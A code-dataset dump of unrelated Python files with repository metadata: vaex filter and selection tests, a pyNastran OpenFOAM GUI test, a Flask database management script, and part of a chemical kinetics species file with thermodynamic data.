    total_2 = df.sum("x", selection=True)
    assert total_2 == total_subset
def test_selection_and_filter():
    """Selecting rows and filtering the df must expose the same values."""
    x = np.arange(-10, 11, 1)
    y = np.arange(21)
    df = vaex.from_arrays(x=x, y=y)
    df.select(df.x < 0)
    selected_list = df.evaluate(df.x, selection=True).tolist()
    df_filtered = df[df.x < 0]
    filtered_list = df_filtered['x'].tolist()
    assert filtered_list == selected_list
    repr(df_filtered)
    # make sure we can slice, and repr
    df_sliced = df_filtered[:5]
    repr(df_sliced)
def test_filter(df):
    """Filtering keeps matching rows; filters can later be widened with mode='or'."""
    filtered = df[df.x > 4]
    assert filtered.x.tolist() == [5, 6, 7, 8, 9]
    # Widen with an OR (x < 3 rows re-enter), then AND a lower bound back
    # on: the result is the union minus nothing below zero.
    widened = filtered.filter(filtered.x < 3, mode="or")
    widened = widened.filter(widened.x >= 0, mode="and")
    assert widened.x.tolist() == [0, 1, 2, 5, 6, 7, 8, 9]
def test_filter_boolean_scalar_variable(df):
    """A boolean scalar variable can be used as a filter expression."""
    df = df[df.x>4]
    assert df.x.tolist() == list(range(5,10))
    # "production" is a scalar True variable; OR-ing it in readmits all rows.
    df.add_variable("production", True)
    df = df.filter("production", mode="or")
    df = df[df.x>=0] # restore old filter (df_filtered)
    df = df[df.x<10] # restore old filter (df_filtered)
    assert df.x.tolist() == list(range(10))
def test_selection_with_filtered_df_invalid_data():
    """A user function applied to a filtered df must never see filtered-out rows."""
    def checked_square(x):
        # the row with x == 4 is filtered out and must not reach this function
        assert 4 not in x
        return x**2

    df = vaex.from_arrays(x=np.arange(10))
    df_filtered = df[df.x != 4]
    df_filtered.add_function('custom_function', checked_square)
    df_filtered['y'] = df_filtered.func.custom_function(df_filtered.x)
    # y values are [0, 1, 4, 9, 25, 36, 49, 64, 81]; eight of them are > 0
    assert df_filtered.count(df_filtered.y, selection='y > 0') == 8
def test_lasso(df):
    """Lasso selection on a plain column pair and on a masked column."""
    xs = [-0.1, 5.1, 5.1, -0.1]
    ys = [-0.1, -0.1, 4.1, 4.1]
    df.select_lasso("x", "y", xs, ys)
    sum_x, sum_y = df.sum(["x", "y"], selection=True)
    np.testing.assert_array_almost_equal(sum_x, 0 + 1 + 2)
    np.testing.assert_array_almost_equal(sum_y, 0 + 1 + 4)

    # repeat with the masked column m (m ~= x)
    xs = [8 - 0.1, 9 + 0.1, 9 + 0.1, 8 - 0.1]
    ys = [-0.1, -0.1, 1000, 1000]
    if df.is_local():
        df._invalidate_selection_cache()
    df.select_lasso("m", "y", xs, ys)
    sum_x, sum_y = df.sum(['m', 'y'], selection=True)
    np.testing.assert_array_almost_equal(sum_x, 8)
    np.testing.assert_array_almost_equal(sum_y, 8**2)
| [
"[email protected]"
]
| |
5c187cef52ac8e1006273cd22ea80940f0c1b7d1 | 485ba262357e10460c74482cd407003ac86886bb | /pyNastran/converters/openfoam/test_openfoam_gui.py | 0d93a5f9986ab459a658b741ae5694fddee65246 | []
| no_license | shangke00GitHub/pyNastran | 13202f3f504dca044755088971176a407622425b | c4509df6ef6c3291c005caada831b443feee734f | refs/heads/master | 2020-11-30T02:45:48.774507 | 2019-12-20T00:56:25 | 2019-12-20T00:56:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,090 | py | import os
import unittest
from cpylog import get_logger
import pyNastran
from pyNastran.gui.testing_methods import FakeGUIMethods
from pyNastran.converters.openfoam.block_mesh import read_block_mesh, mirror_block_mesh
from pyNastran.converters.openfoam.face_file import FaceFile
from pyNastran.converters.openfoam.openfoam_io import OpenFoamIO
from pyNastran.utils import check_path
PKG_PATH = pyNastran.__path__[0]
MODEL_PATH = os.path.join(PKG_PATH, 'converters', 'openfoam', 'models')
class OpenFoamGUI(OpenFoamIO, FakeGUIMethods):
    """Minimal fake GUI that wires OpenFoamIO into the GUI testing harness."""
    def __init__(self):
        FakeGUIMethods.__init__(self)
        self.model = OpenFoamIO(self)
        # register the three OpenFOAM geometry formats; fail loudly if any is missing
        self.build_fmts(['openfoam_hex', 'openfoam_shell', 'openfoam_faces'], stop_on_failure=True)
class TestOpenFoamGUI(unittest.TestCase):
    """GUI-level tests for loading OpenFOAM geometry."""

    def test_openfoam_geometry_01(self):
        """loads the SnakeRiverCanyon blockMeshDict as shell and hex geometry"""
        log = get_logger(level='warning', encoding='utf-8')
        geometry_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict')
        bdf_filename = os.path.join(MODEL_PATH, 'SnakeRiverCanyon', 'system', 'blockMeshDict.bdf')
        check_path(geometry_filename, 'geometry_filename')

        test = OpenFoamGUI()
        test.log = log
        test.on_load_geometry(geometry_filename, geometry_format='openfoam_shell', raise_error=True)
        test.on_load_geometry(geometry_filename, geometry_format='openfoam_hex', raise_error=True)
        # loading the hex geometry writes this as a side effect
        os.remove('points.bdf')

        model = read_block_mesh(geometry_filename, log=log)
        block_mesh_name_out = 'blockMeshDict.out'
        # write the block mesh both without and with symmetry
        model.write_block_mesh(
            block_mesh_name_out=block_mesh_name_out, make_symmetry=False)
        model.write_block_mesh(
            block_mesh_name_out=block_mesh_name_out, make_symmetry=True)
        model.write_bdf(bdf_filename, model.nodes, model.hexas)
        mirror_block_mesh(geometry_filename, block_mesh_name_out)
        os.remove(block_mesh_name_out)

    def test_openfoam_2(self):
        """reads a small faces file, optionally restricted to a subset of faces"""
        point_filename = 'points'
        with open(point_filename, 'w') as point_file:
            point_file.write('0. 0. 0.\n')

        face_filename = 'faces'
        with open(face_filename, 'w') as face_file:
            face_file.write('2\n')
            face_file.write('\n')
            face_file.write('3 1 2 3\n')
            face_file.write('3 1 3 4\n')

        faces = FaceFile(log=None, debug=False)
        faces.read_face_file(face_filename)
        faces.read_face_file(face_filename, ifaces_to_read=[1])
        faces.read_face_file(face_filename, ifaces_to_read=[0, 1])
        os.remove(point_filename)
        os.remove(face_filename)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| [
"[email protected]"
]
| |
1df490347f6ba150e4c18eda8adb09b65cfd0cbd | 7ca50753ed3ff4c6115f8be3de675c91631c382f | /manage.py | 8c8509f5ee95dfc01cb27aa14ab0dd2c753db751 | []
| no_license | harrywang/flask-tdd-docker | a63ca86062dc05ab99591ef4ce609d90868f6e77 | 2677c52ae8dba84695d032fd309ee864f7fb2521 | refs/heads/master | 2023-05-11T15:44:04.689565 | 2020-03-21T20:00:57 | 2020-03-21T20:00:57 | 248,801,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 565 | py | # manage.py
import sys
from flask.cli import FlaskGroup
from project import create_app, db
from project.api.users.models import User
app = create_app()
cli = FlaskGroup(create_app=create_app)
@cli.command('recreate_db')
def recreate_db():
    """Drop and recreate all database tables (destroys any existing data)."""
    db.drop_all()
    db.create_all()
    db.session.commit()
@cli.command('seed_db')
def seed_db():
    """Insert a couple of sample users into the database."""
    db.session.add(User(username='michael', email="[email protected]"))
    db.session.add(User(username='michaelherman', email="[email protected]"))
    db.session.commit()
if __name__ == '__main__':
cli()
| [
"[email protected]"
]
| |
ed2f46727aa6af253e2f0bda84ca29d56ea9a2af | 41fd80f9ccc72a17c2db16b7019312a87d3181e8 | /zhang_local/pdep/network4339_1.py | 52702a2b7fa8af0d6b888aed032edd7cb7a99807 | []
| no_license | aberdeendinius/n-heptane | 1510e6704d87283043357aec36317fdb4a2a0c34 | 1806622607f74495477ef3fd772908d94cff04d9 | refs/heads/master | 2020-05-26T02:06:49.084015 | 2019-07-01T15:12:44 | 2019-07-01T15:12:44 | 188,069,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 53,984 | py | species(
label = '[CH]C(=[CH])C([CH2])C(18883)',
structure = SMILES('[CH]C(=[CH])C([CH2])C'),
E0 = (739.718,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2800,2850,1350,1500,750,1050,1375,1000,1380,1390,370,380,2900,435,3120,650,792.5,1650,350,440,435,1725,510.927,510.939,510.946],'cm^-1')),
HinderedRotor(inertia=(0.289946,'amu*angstrom^2'), symmetry=1, barrier=(53.7133,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.289928,'amu*angstrom^2'), symmetry=1, barrier=(53.7135,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.289953,'amu*angstrom^2'), symmetry=1, barrier=(53.7128,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.289951,'amu*angstrom^2'), symmetry=1, barrier=(53.7141,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.04902,0.0582,-3.35514e-05,4.61057e-09,2.14951e-12,89079.6,26.026], Tmin=(100,'K'), Tmax=(1015.18,'K')), NASAPolynomial(coeffs=[11.0759,0.030956,-1.14174e-05,1.97523e-09,-1.32045e-13,86411.8,-25.6117], Tmin=(1015.18,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(739.718,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)CsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + longDistanceInteraction_noncyclic(CdCs-ST) + group(Cds-CdsHH) + radical(Isobutyl) + radical(Cds_P) + radical(AllylJ2_triplet)"""),
)
species(
label = 'C=CC(42)',
structure = SMILES('C=CC'),
E0 = (6.12372,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3010,987.5,1337.5,450,1655,2950,3100,1380,975,1025,1650],'cm^-1')),
HinderedRotor(inertia=(0.597443,'amu*angstrom^2'), symmetry=1, barrier=(13.7364,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (42.0797,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2218.31,'J/mol'), sigma=(4.982,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.30977,0.00827491,3.37717e-05,-4.3931e-08,1.58773e-11,767.476,9.64349], Tmin=(100,'K'), Tmax=(988,'K')), NASAPolynomial(coeffs=[5.41204,0.0172866,-6.51359e-06,1.20323e-09,-8.55924e-14,-503.177,-4.80153], Tmin=(988,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(6.12372,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(203.705,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsHH)"""),
)
species(
label = '[CH]=C=[CH](18734)',
structure = SMILES('[CH]=C=[CH]'),
E0 = (491.681,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([540,610,2055,239.877,511.233,1743.98,1746.51,1747.6,1753.44],'cm^-1')),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (38.048,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1737.73,'J/mol'), sigma=(4.1,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.766,0.0170203,-1.57568e-05,7.95984e-09,-1.4265e-12,59188.9,11.2142], Tmin=(100,'K'), Tmax=(1806.04,'K')), NASAPolynomial(coeffs=[4.81405,0.00509933,2.77647e-07,-2.23082e-10,1.96202e-14,59653.5,3.45727], Tmin=(1806.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(491.681,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cds-CdsHH) + group(Cds-CdsHH) + group(Cdd-CdsCds) + radical(C=C=CJ) + radical(C=C=CJ)"""),
)
species(
label = 'H(8)',
structure = SMILES('[H]'),
E0 = (211.805,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (1.00794,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1205.6,'J/mol'), sigma=(2.05,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,9.24385e-15,-1.3678e-17,6.66185e-21,-1.00107e-24,25474.2,-0.444973], Tmin=(100,'K'), Tmax=(3459.6,'K')), NASAPolynomial(coeffs=[2.5,9.20456e-12,-3.58608e-15,6.15199e-19,-3.92042e-23,25474.2,-0.444973], Tmin=(3459.6,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(211.805,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""H""", comment="""Thermo library: primaryThermoLibrary"""),
)
species(
label = '[CH]C(=[CH])C(=C)C(19687)',
structure = SMILES('[CH]C(=[CH])C(=C)C'),
E0 = (636.521,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,2950,3100,1380,975,1025,1650,180,180,180],'cm^-1')),
HinderedRotor(inertia=(2.11706,'amu*angstrom^2'), symmetry=1, barrier=(48.6754,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.11657,'amu*angstrom^2'), symmetry=1, barrier=(48.6641,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.11677,'amu*angstrom^2'), symmetry=1, barrier=(48.6687,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (79.1198,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.895327,0.0606763,-4.09674e-05,9.40654e-09,1.0466e-12,76674.1,21.159], Tmin=(100,'K'), Tmax=(1031.13,'K')), NASAPolynomial(coeffs=[13.2617,0.0259733,-9.78747e-06,1.72745e-09,-1.17364e-13,73418.4,-42.3016], Tmin=(1031.13,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(636.521,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(295.164,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(AllylJ2_triplet) + radical(Cds_P)"""),
)
species(
label = '[CH](2815)',
structure = SMILES('[CH]'),
E0 = (585.033,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([4000],'cm^-1')),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (13.0186,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.1763,-0.00339736,5.29655e-06,-3.21799e-09,7.28313e-13,70356.4,-0.99239], Tmin=(100,'K'), Tmax=(1260.74,'K')), NASAPolynomial(coeffs=[3.26554,0.000229807,1.03509e-07,-7.93772e-12,-2.40435e-16,70527.4,3.38009], Tmin=(1260.74,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(585.033,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo library: primaryThermoLibrary + radical(CJ3)"""),
)
species(
label = 'C#CC([CH2])C(5193)',
structure = SMILES('C#CC([CH2])C'),
E0 = (321.758,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,750,770,3400,2100,1380,1390,370,380,2900,435,2175,525,3000,3100,440,815,1455,1000],'cm^-1')),
HinderedRotor(inertia=(0.46208,'amu*angstrom^2'), symmetry=1, barrier=(10.6241,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0666038,'amu*angstrom^2'), symmetry=1, barrier=(83.0888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(3.60399,'amu*angstrom^2'), symmetry=1, barrier=(82.8629,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (67.1091,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.05266,0.0371709,-7.10649e-06,-1.96893e-08,1.19932e-11,38774.1,18.6599], Tmin=(100,'K'), Tmax=(877.4,'K')), NASAPolynomial(coeffs=[9.62985,0.0193968,-5.38942e-06,7.89676e-10,-4.88604e-14,36799,-20.583], Tmin=(877.4,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(321.758,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(270.22,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CtCsCsH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Ct-CtCs) + group(Ct-CtH) + radical(Isobutyl)"""),
)
species(
label = '[CH3](11)',
structure = SMILES('[CH3]'),
E0 = (135.382,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([570.572,1408.13,1408.49,4000,4000,4000],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.91547,0.00184154,3.48742e-06,-3.32748e-09,8.49957e-13,16285.6,0.351741], Tmin=(100,'K'), Tmax=(1337.63,'K')), NASAPolynomial(coeffs=[3.54146,0.00476787,-1.82148e-06,3.28877e-10,-2.22546e-14,16224,1.66035], Tmin=(1337.63,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(135.382,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(108.088,'J/(mol*K)'), comment="""Thermo library: primaryThermoLibrary + radical(CH3)"""),
)
species(
label = '[CH]C(=[CH])C=C(19261)',
structure = SMILES('[CH]C(=[CH])C=C'),
E0 = (674.111,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3120,650,792.5,1650,2950,3100,1380,975,1025,1650,350,440,435,1725,3010,987.5,1337.5,450,1655,180,180,180],'cm^-1')),
HinderedRotor(inertia=(2.10119,'amu*angstrom^2'), symmetry=1, barrier=(48.3106,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(2.0992,'amu*angstrom^2'), symmetry=1, barrier=(48.2648,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 4,
opticalIsomers = 1,
molecularWeight = (65.0932,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.78075,0.0401882,-8.76075e-06,-1.97193e-08,1.12783e-11,81164.5,17.38], Tmin=(100,'K'), Tmax=(955.832,'K')), NASAPolynomial(coeffs=[12.0562,0.0178508,-6.13458e-06,1.06669e-09,-7.39864e-14,78256.3,-36.6668], Tmin=(955.832,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(674.111,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(224.491,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-Cds(Cds-Cds)Cs) + group(Cds-Cds(Cds-Cds)H) + group(Cds-CdsHH) + group(Cds-CdsHH) + radical(Cds_P) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH][C]=[CH](21256)',
structure = SMILES('[CH][C]=[CH]'),
E0 = (861.746,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1685,370,3120,650,792.5,1650,180,180],'cm^-1')),
HinderedRotor(inertia=(2.1891,'amu*angstrom^2'), symmetry=1, barrier=(50.3317,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (38.048,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.18317,0.0164338,-7.13252e-06,1.19383e-09,-3.27944e-14,103675,12.0918], Tmin=(100,'K'), Tmax=(1799.19,'K')), NASAPolynomial(coeffs=[6.32962,0.0112581,-4.33439e-06,7.19107e-10,-4.49321e-14,102248,-5.75439], Tmin=(1799.19,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(861.746,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(103.931,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsH) + group(Cds-CdsHH) + radical(Cds_P) + radical(Cds_S) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH2][CH]C(44)',
structure = SMILES('[CH2][CH]C'),
E0 = (279.046,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,3000,3100,440,815,1455,1000,3025,407.5,1350,352.5],'cm^-1')),
HinderedRotor(inertia=(0.00418548,'amu*angstrom^2'), symmetry=1, barrier=(6.91848,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.00418537,'amu*angstrom^2'), symmetry=1, barrier=(6.91838,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (42.0797,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.25505,0.0137285,1.00536e-05,-1.43788e-08,4.3875e-12,33590.4,14.1736], Tmin=(100,'K'), Tmax=(1201.86,'K')), NASAPolynomial(coeffs=[3.74312,0.0203097,-8.40105e-06,1.5386e-09,-1.05137e-13,32880.4,9.26373], Tmin=(1201.86,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(279.046,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(199.547,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJ) + radical(CCJC)"""),
)
species(
label = '[CH]C([CH])=C(C)C(21272)',
structure = SMILES('[CH]C([CH])=C(C)C'),
E0 = (633.357,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,325,375,415,465,420,450,1700,1750,200,800,1000,1200,1400,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[1.34145,0.0595696,-3.30538e-05,9.11995e-09,-1.06436e-12,76268.9,22.2278], Tmin=(100,'K'), Tmax=(1774.5,'K')), NASAPolynomial(coeffs=[9.96714,0.0401259,-1.66178e-05,2.94502e-09,-1.944e-13,73207.7,-24.3331], Tmin=(1774.5,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(633.357,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsCs) + radical(AllylJ2_triplet) + radical(AllylJ2_triplet)"""),
)
species(
label = '[CH]C([CH2])=C([CH2])C(18079)',
structure = SMILES('[CH]C([CH2])=C([CH2])C'),
E0 = (565.671,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,325,375,415,465,420,450,1700,1750,3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,435.027,435.118,435.22],'cm^-1')),
HinderedRotor(inertia=(0.381444,'amu*angstrom^2'), symmetry=1, barrier=(51.1879,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.381355,'amu*angstrom^2'), symmetry=1, barrier=(51.1799,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.380777,'amu*angstrom^2'), symmetry=1, barrier=(51.1824,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.380691,'amu*angstrom^2'), symmetry=1, barrier=(51.1758,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.908188,0.0595149,-3.25415e-05,3.40661e-09,2.0794e-12,68152.9,23.256], Tmin=(100,'K'), Tmax=(1101.48,'K')), NASAPolynomial(coeffs=[12.3301,0.0313888,-1.24226e-05,2.23507e-09,-1.52544e-13,64826.7,-36.6291], Tmin=(1101.48,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(565.671,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(315.95,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cs-(Cds-Cds)HHH) + group(Cds-CdsCsCs) + group(Cds-CdsCsCs) + radical(Allyl_P) + radical(AllylJ2_triplet) + radical(Allyl_P)"""),
)
species(
label = '[CH]C(=C)C([CH2])[CH2](17727)',
structure = SMILES('[CH]C(=C)C([CH2])[CH2]'),
E0 = (697.704,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3033.33,3066.67,3100,415,465,780,850,1435,1475,900,1100,2950,3100,1380,975,1025,1650,1380,1390,370,380,2900,435,350,440,435,1725,623.021,623.022,623.022,623.023],'cm^-1')),
HinderedRotor(inertia=(0.200176,'amu*angstrom^2'), symmetry=1, barrier=(55.1377,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.200177,'amu*angstrom^2'), symmetry=1, barrier=(55.1377,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.200176,'amu*angstrom^2'), symmetry=1, barrier=(55.1376,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.200175,'amu*angstrom^2'), symmetry=1, barrier=(55.1377,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 5,
opticalIsomers = 1,
molecularWeight = (80.1277,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(3248.85,'J/mol'), sigma=(5.90911,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with Tc=507.46 K, Pc=35.73 bar (from Joback method)"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
